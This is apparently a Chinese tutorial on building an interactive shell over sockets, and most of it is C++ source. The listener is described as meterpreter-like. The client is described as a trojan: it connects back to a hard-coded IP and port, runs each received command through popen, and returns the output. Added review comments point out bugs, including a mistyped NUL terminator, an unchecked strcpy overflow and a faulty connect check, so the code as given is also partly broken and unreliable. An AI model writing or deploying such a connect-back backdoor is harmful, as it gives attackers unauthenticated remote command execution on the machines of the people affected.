Socket实现交互式shell
使用socket系列函数实现,原理很简单,就不多说了.
服务端代码: (相当于meterpreter)
#include <iostream>
#include <cstdio>
#include <cstring>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <cstdlib>
#define SERVER_PORT 3456
using namespace std;
// Listener side: binds TCP port SERVER_PORT on all interfaces, accepts a
// single client, then relays console input to the client as command text
// and prints whatever the client sends back. Runs until the operator
// types "exit" (see the comparison below, which has a newline issue).
// No authentication or transport protection is applied: any peer that can
// reach this port is handed the console loop. Return values of socket(),
// bind(), listen(), accept(), read() and write() are not checked.
void shell() {
int sock;
struct sockaddr_in server_addr;
sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&server_addr, sizeof(server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_addr.s_addr = htonl(INADDR_ANY);  // listens on every interface, not just loopback
server_addr.sin_port = htons(SERVER_PORT);
bind(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));  // failure (e.g. port in use) is ignored
cout << "Waiting client..." << endl;
listen(sock, 128);
// 0x1000-byte receive buffer; malloc() result is not checked and the
// buffer is never freed before the function returns.
char *buf =(char *)malloc(0x1000);
int text_len = 0;
struct sockaddr_in client;
int client_sock;
char client_ip[64];  // declared but never filled or printed
socklen_t client_addr_len = sizeof(client);
client_sock = accept(sock, (struct sockaddr *)&client, &client_addr_len);
// NOTE(review): "Client ip: " is followed directly by " port: " — the
// address itself is never formatted, so the log line has no IP in it.
cout << "Successful connection!"
<< endl
<< "Client ip: "
<< " port: "
<< ntohs(client.sin_port)
<< endl;
while(true) {
text_len = read(client_sock, buf, 0x1000 - 1);  // a read error (-1) or EOF (0) just spins this loop
if(text_len > 0){
// 'x00' is a multi-character constant, most likely a transcription of
// '\0'. As written the stored byte is not a NUL terminator, so the
// cout below may run past the received data.
buf[text_len] = 'x00';
cout << buf;
// Reuses the receive buffer for operator input. fgets() keeps the
// trailing '\n', so with line-based terminal input the strcmp against
// "exit" below will not match unless the newline is absent.
fgets(buf, 0x200, stdin);
if(!strcmp(buf, "exit")) {
cout << "Closed connection" << endl;
write(client_sock, "exit", 0x5);  // 5 bytes: the word plus its NUL terminator
break;
}
write(client_sock, buf, strlen(buf) + 1);  // sends the terminating NUL along with the text
}
}
close(client_sock);  // the listening socket `sock` is left open
}
// Entry point: disables stdio buffering so prompts and relayed output
// appear immediately, then runs the single-client listener loop.
int main(void) {
setbuf(stdin, 0);
setbuf(stdout, 0);
shell();
return 0;
}
客户端代码: (相当于木马)
#include <cstdlib>
#include <iostream>
#include <cstdio>
#include <cstring>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define SERVER_PORT 3456
#define SERVER_IP "192.168.100.3"
using namespace std;
// Runs `cmd` through popen() and appends the first line of its stdout to
// `result`. `cmd` is whatever arrived over the socket, so this is an
// unauthenticated remote command execution primitive; from a defender's
// view, a process whose parent holds a raw TCP connection and spawns
// "/bin/sh -c" children is the observable signature.
//
// Defects visible here:
//  - strcpy() into the 1024-byte `ps` has no length check; the caller
//    passes up to 0x1000-1 bytes, so an oversized command overflows `ps`.
//  - strcat() appends to `result` without knowing its capacity, and
//    `result` is never cleared, so output accumulates across calls
//    (the caller also hands in an uninitialised malloc() buffer).
//  - the unconditional `break` means only the first line of output is
//    captured; the remainder is discarded at pclose().
void exeCmd(const char *cmd, char *result)
{
char buf_ps[1024];
char ps[1024]={0};
FILE *ptr;
strcpy(ps, cmd);
if((ptr=popen(ps, "r"))!=NULL)
{
while(fgets(buf_ps, 1024, ptr)!=NULL)
{
strcat(result, buf_ps);
// if(strlen(result) > 4000)
break;  // exits after the first line regardless of the commented-out check above
}
pclose(ptr);
ptr = NULL;
}
else
{
cout << "popen error: " << ps << endl;
}
}
// Connect-back side: dials SERVER_IP:SERVER_PORT, then loops reading a
// command string from the socket, executing it via exeCmd(), and writing
// the captured output back. The remote address is hard-coded and the
// channel is plain TCP with no authentication or encryption.
void shell(){
int sockfd = 0;
struct sockaddr_in serveraddr;
// Two 0x1000-byte buffers; malloc() results are unchecked, neither is
// freed, and buf_w is never zeroed before exeCmd() strcat()s into it.
char *buf_r = (char *)malloc(0x1000);
char *buf_w = (char *)malloc(0x1000);
int text_len = 0;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
bzero(&serveraddr, sizeof(struct sockaddr_in));
serveraddr.sin_family = AF_INET;
inet_pton(AF_INET, SERVER_IP, &serveraddr.sin_addr);
serveraddr.sin_port = htons(SERVER_PORT);
while(true){
cout << "connecting";
// connect()'s return value is discarded; the test below looks at the
// descriptor number, which is already > 0 whether or not the connection
// succeeded, so this "retry" loop exits after the first attempt.
connect(sockfd, (struct sockaddr *)&serveraddr, sizeof(serveraddr));
if(sockfd > 0) {
cout << "connected!";
// "connected!" is 11 bytes including its NUL, but 0x10 (16) bytes are
// sent, so 5 bytes beyond the literal are read and transmitted.
write(sockfd, "connected!", 0x10);
break;
}
}
while(true) {
text_len = read(sockfd, buf_r, 0x1000 - 1);
// Written before the length check: a read() error returns -1, which
// makes this an out-of-bounds store at buf_r[-1]. 'x00' is also a
// multi-character constant (likely meant '\0'), so the buffer is not
// actually NUL-terminated.
buf_r[text_len] = 'x00';
if(text_len > 0) {
// The command runs before the "exit" comparison, so "exit" is itself
// handed to popen() once before the loop ends.
exeCmd(buf_r, buf_w);
text_len = strlen(buf_w);
if(!strcmp(buf_r, "exit")) {
break;
}
write(sockfd, buf_w, text_len + 1);  // includes the NUL terminator
}
}
close(sockfd);
}
// Entry point: disables stdio buffering so status messages are flushed
// immediately, then runs the connect-back command loop.
int main(void) {
setbuf(stdin, 0);
setbuf(stdout, 0);
shell();
return 0;
}